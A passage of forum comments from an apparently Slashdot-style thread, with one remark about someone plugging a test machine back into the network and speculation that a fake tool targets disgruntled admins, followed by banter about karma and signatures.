  233. You need to forget to erase it by zaphraud · · Score: 1

    So that the next day, a coworker wonders why that "safe, unconnected" machine you set up to play with this isn't plugged in, and "fixes" the problem real quick, so that all the network lights on the panel in back match again... Still think this one was intended for disgruntled admins to install; it's an obvious fake, but if installed by a disgruntled admin, it only has to look real enough to fool a jury or a boss (just in case).

  234. Re: text (Why? Because.) by Stephen+Samuel · · Score: 1

    Well, now we both got to karma whore, so everybody's happy at this end of the stick.

    --
    Free Software: Like love, it grows best when given away.
  235. Re: text (Why? Because.) by Thing+1 · · Score: 1
    Absolutely! ;-)

    Btw, I like your sig. I've seen you around here, time to make you a friend.

    Cheers!

    PS Not really whoring since +1 Funny doesn't actually affect karma, according to the docs, but it's still fun to make others laugh.

    --
    I feel fantastic, and I'm still alive.
  236. Re:Most of users won’t effect but look out fo by zuesse · · Score: 1

    Are fat fingers considered a bug?
    Can't seem to find that one.

    --
    What great fortune for rulers that men do not think.